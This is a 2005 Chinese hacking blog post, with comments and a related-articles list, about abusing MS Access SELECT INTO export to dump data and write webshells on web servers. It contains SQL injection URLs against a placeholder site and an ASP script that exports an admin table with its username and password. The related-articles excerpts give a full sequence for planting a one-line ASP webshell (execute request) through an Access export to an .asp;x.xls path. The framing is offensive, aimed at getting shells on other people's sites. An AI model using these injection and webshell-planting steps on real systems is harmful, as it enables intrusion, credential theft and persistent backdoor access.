对ACCESS导出SHELL的研究 kevin1986

最新推荐文章于 2020-12-18 22:50:04 发布
最新推荐文章于 2020-12-18 22:50:04 发布
阅读量2.9k 收藏
点赞数
分类专栏: 数据の库 文章标签: access shell 数据库 测试 asp sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/383293
版权
今天上化学课睡觉的时候( 汗......)做梦,梦到自己渗透一台MAGIC=OFF的PHP注入点,然后开心的口水都流下来了(.....睡的太那个了),突然醒过来,马上在纸上写下做梦梦到的思路:利用ACCESS导出WEBSHELL......难道不是很绝妙吗?

于是晚上到网上查了查资料,发现有几种导出数据库的研究
程序代码:
SELECT * into [mytest.txt] IN 'd:/' 'text;' FROM mydata

|导出成TXT文件.成功
程序代码:
select * into [aaa] in 'd:/' 'dbase IV;' from mydata

|导出成DBF文件,也成功.
但是就是无法导出成ASP或者其他后缀的文件,的确有点怪异,个人认为是在'text;'和'dbase IV'这样的类型中取选的。所以我在ODBC数据源中查了查,好象也没有自定义类型的,很郁闷.....
没什么办法,去问了一下SuperHei....他说他也没研究过,嘿嘿,还是新思路啊..看来我要多研究一下.
.不久我在CHINAASPPRO查到了一篇文章里面说可以这样导出数据库,也就是BACKUP一部分数据,但是我在老兵的SQL数据库管理器中执行出错,不清楚原因.但是仔细看了一下是将C:/TEMP.MDB导入Customers,也不算什么导出.哎.运气不顺..
程序代码:
INSERT INTO Customers IN 'C:/TEMP.MDB' SELECT * FROM [New Customers]


记得很早以前我看到过一篇文章就是有人将数据库文件导成任意文件,如果这样的话就能得到SHELL啦.但是我还是没有成功,如果谁成功了加我QQ一下,我们一起讨论.
9817500

其实如果可以的话里哟还是简单的,比如这样一个注入点
http://www.www.com/a.asp?id=1
我们可以这样改
www.www.com/a.asp?id=-1 union select 1,2,3,4,5,said,7,8,9 from users where id=1
这样就得到了said文件的内容,然后我们可以这样导:比如导成TXT文件
www.www.com/a.asp?id=-1 union select 1,2,3,4,5,said,7,8,9 from users where id=1 into [hackedbykevin.txt] IN 'E:/' 'text;' FROM users where id=1
这样理论上就生成了e:/hackedbykevin.txt
但是我在测试的时候发生了很郁闷的事情,我也不知道为什么....
引用内容:

Microsoft JET Database Engine 错误 '80004005' 

动作查询不能作为行的来源。 

/info/adm2.asp,行7 

时间很晚了.我也没研究下去....还是给大家研究了.黑客精神就是共享嘛.呵呵
 sniper 于 2005-02-11 01:46 AM 发表评论: 
union的时候在后面使用into是行不通滴,我以前测试过

 kevin1986 于 2005-02-09 06:48 PM 发表评论: 
Union的确是不行的。不过某次我在弄一个LeadBBS的时候用他里面的执行SQL语句成了一次,但是也没用到Union。晚上和你继续讨论吧。最近很想去弄弄asp+mysql的系统。。。发挥一下4ngel的东西。叫小A也来

 superhei 于 2005-02-09 05:29 PM 发表评论: 
xixi 上次没时间去测试,今天测试了下
<%
Set Conn = Server.CreateObject("ADODB.Connection") 
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset") 
Conn.Open dsn 
SQL = "SELECT * into [mytest112.txt] IN 'c:/' 'text;'  FROM admin;"
rs.open sql,conn 
if rs.eof and rs.bof then 
' Access Denied 
else 
' Access Allowed 
end if
rs.close
set rs=nothing
'关闭连接
conn.close
set conn=nothing
response.write "sql为:" &sql

%> 
这样是可以成功的 
C:/>dir mytest*.txt
 驱动器 C 中的卷是 AAAAAAA
 卷的序列号是 3CEE-A8A9

 C:/ 的目录

2005-02-09  17:27                   46 mytest112.txt
               1 个文件             46 字节
               0 个目录    885,846,016 可用字节

C:/>type mytest112.txt
"id","f_name","f_password"
1,"admin","pass"

因为语句 SELECT * into [mytest112.txt] IN 'c:/' 'text;'  FROM admin;因为 into [mytest112.txt] IN 'c:/' 'text;'的位置的原因 在注射中 没办法导出本语句的查询内容(select * from admin where id=$id)

如果用union的话 就会出现 上面你测试的那样的错误 :( 不过即使可以用没什么大的意义 因为如果不可以导出
asp等的话 只导出数据也没必要 因为union 可以直接替换出来 :)
freexploit
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kEvin1986 blog
07-17
kEvin1986 blogkEvin1986 blog
iis和apache的exploit一个是kevin1986写的 一个是我写的 呵呵
FreeXploiT
04-03 1768
http://free3.e-168.cn/kevin1986/Apexp.exe  kevin的http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=31415 我的
access实例_详解7个shell脚本实例,值得收藏练习
weixin_39609822的博客
11-24 771
概述看多shell脚本实例自然就会有shell脚本的编写思路了,所以我一般比较推荐看脚本实例来练习shell脚本。下面分享几个shell脚本实例。1、监测Nginx访问日志502情况,并做相应动作假设服务器环境为lnmp,近期访问经常出现502现象,且502错误在重启php-fpm服务后消失,因此需要编写监控脚本,一旦出现502,则自动重启php-fpm服务。#场景:#1.访问日志文件的路径:/d...
[转]Shell分析access_log
wangqiaowqo的专栏
04-10 205
#查看80端口的tcp连接 #netstat -tan | grep "ESTABLISHED" | grep ":80" | wc -l 1 #当前WEB服务器中联接次数最多的ip地址: #netstat -ntu |awk '{print $5}' |sort | uniq -c| sort -n -r 231 ::ffff:127.0.0.1:8095 2...
ACCESS导出一句话SHELL
asli33的专栏
08-14 393
1.create table cmd (a varchar(50)) 2.insert into cmd (a) values (‘’) 3.select * into [a] in ‘C:\\www.tmdsb.com\\tmdsb.asa;.xls’ ‘excel 4.0;’ from cmd (把表cmd的内容导出为物理路径的一个EXCEL文件) 4.drop table cmd
Access数据库导出数据到Excel.zip
03-30
3. 接着,你需要指定导出文件的位置和文件名,例如"Access数据导出到Excel.xlsx"。 4. 你可以选择是否要在Excel中保留Access的表结构,包括主键和索引。如果不需要,可以选择“导出数据”选项,只导出实际数据。 5. ...
ACCESS对象导入与导出XML模块.rar
04-03
在Microsoft Access中,XML(可扩展标记语言)是一种常用的数据交换格式,允许用户将数据库对象和数据导出到XML文件,或从XML文件导入到Access数据库。本资源"ACCESS对象导入与导出XML模块.rar"提供了易语言编写的...
ACCESS数据库导出到VFP数据库或数据表
10-24
本主题聚焦于如何将Microsoft Access数据库导出到Visual FoxPro(VFP)数据库或数据表。Access和VFP都是流行的关系型数据库管理系统,但它们的数据存储格式不同,因此需要进行数据转换。 **Access数据库与VFP数据库...
Access数据库中的数据导出到Excel中.rar
04-03
当我们在Access中积累了大量数据时,有时需要将这些数据导出到Excel以便于进一步的分析、处理或共享。下面,我们将详细介绍如何从Access数据库导出数据到Excel。 首先,你需要确保你的系统中已经安装了Access和...
易语言ACCESS对象导入与导出XML模块
08-16
易语言ACCESS对象导入与导出XML模块源码 系统结构:accesstoxml, ======程序集1 | | | |------ _启动子程序 | | | |------ _临时子程序 | | | |------ accesstoxml
access 导出webshell
blogfeifei
08-22 138
create table cmd(shell text) insert into cmd (shell) values('&lt;%execute request(1)%&gt;') SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd
Access导出一句话拿shell实战
收集盒 Book box
08-30 1528
目标站:http://www.xxxx.com 我艹,开头太简单了,直接啊D搞定一切,就连TM的管理员md5还那么弱智,让我跑出来了,囸!直接进后台: 看到数据库备份我笑了,哈哈哈!老方法本地备份突破下,结果发现丫的不行!目录是只读的。 不过
ACCESS导出一句话拿webshell
jihaichen的博客
05-04 1105
第一句代码create table cmd (a varchar(50))  第二句代码insert into cmd (a) values ('一句话木马')  第三句代码select * into [a] in 'e:\host\chouwazi.com\web\data\xiao.asp;xiao.xls' 'excel 4.0;' from cmd  第四句代码drop table cmd...
vb代码让cmd执行命令_vb,关于shell调用cmd执行命令?
weixin_39716264的博客
12-18 1978
展开全部VB中Shell执行CMD命令32313133353236313431303231363533e58685e5aeb931333337626232使用如下代码Shell"cmd.exe/c你要执行的命令"其中要执行的命令中需要注意空格问题 如果一个参数中有空格就需要使用双引号引起来,双引号在VB字符串中使用两个双引号("")表示。例如:Shell"cmd.exe/ccopy"...
安全警报:针对Access漏洞又一发现(转)
cuanjun1153的博客
09-19 242
安全警报:针对Access漏洞又一发现(转)[@more@]  如今SQL injection可谓是火爆,诸多新的Injection方式被挖掘出来。利用系统错误来爆路径,更是热门话题,今天我也凑个热闹。  本例测试适用于ACCE...
ACCESS追加查询时出的错误
Hank's Techblog
01-14 3488
在做消费的时候用了一个追加查询:INSERT INTO xfxxjl ( xfxxjl_id, xfxxjl_yh_id, xfxxjl_zd, xfxxjl_spbm, xfxxjl_spmc, xfxxjl_dj, xfxxjl_zk, xfxxjl_zhdj, xfxxjl_sl, xfxxjl_je )SELECT temp_id, temp_yh_id, temp_zd, temp_
access进阶注入语句
Coisini的博客
05-26 1461
union查询法 首先要说的就是查询办法,一般的查询办法就是 程序代码 and 1=(select count(*) from admin where left(id,1)=‘1’) 这样开始判断了…就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候…基本上你可以去泡壶茶再喝一杯. 所以这个时候,union...
Access2000开发:简化Web决策与数据导出
"《Access2000开发指南》是一本详细介绍如何在Microsoft Access 2000中开发Web页面的实用教程。该书第17章主要聚焦于从Access数据库中的表和查询生成Web页面的技术,帮助用户简化基于Web的决策支持流程。章节内容...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值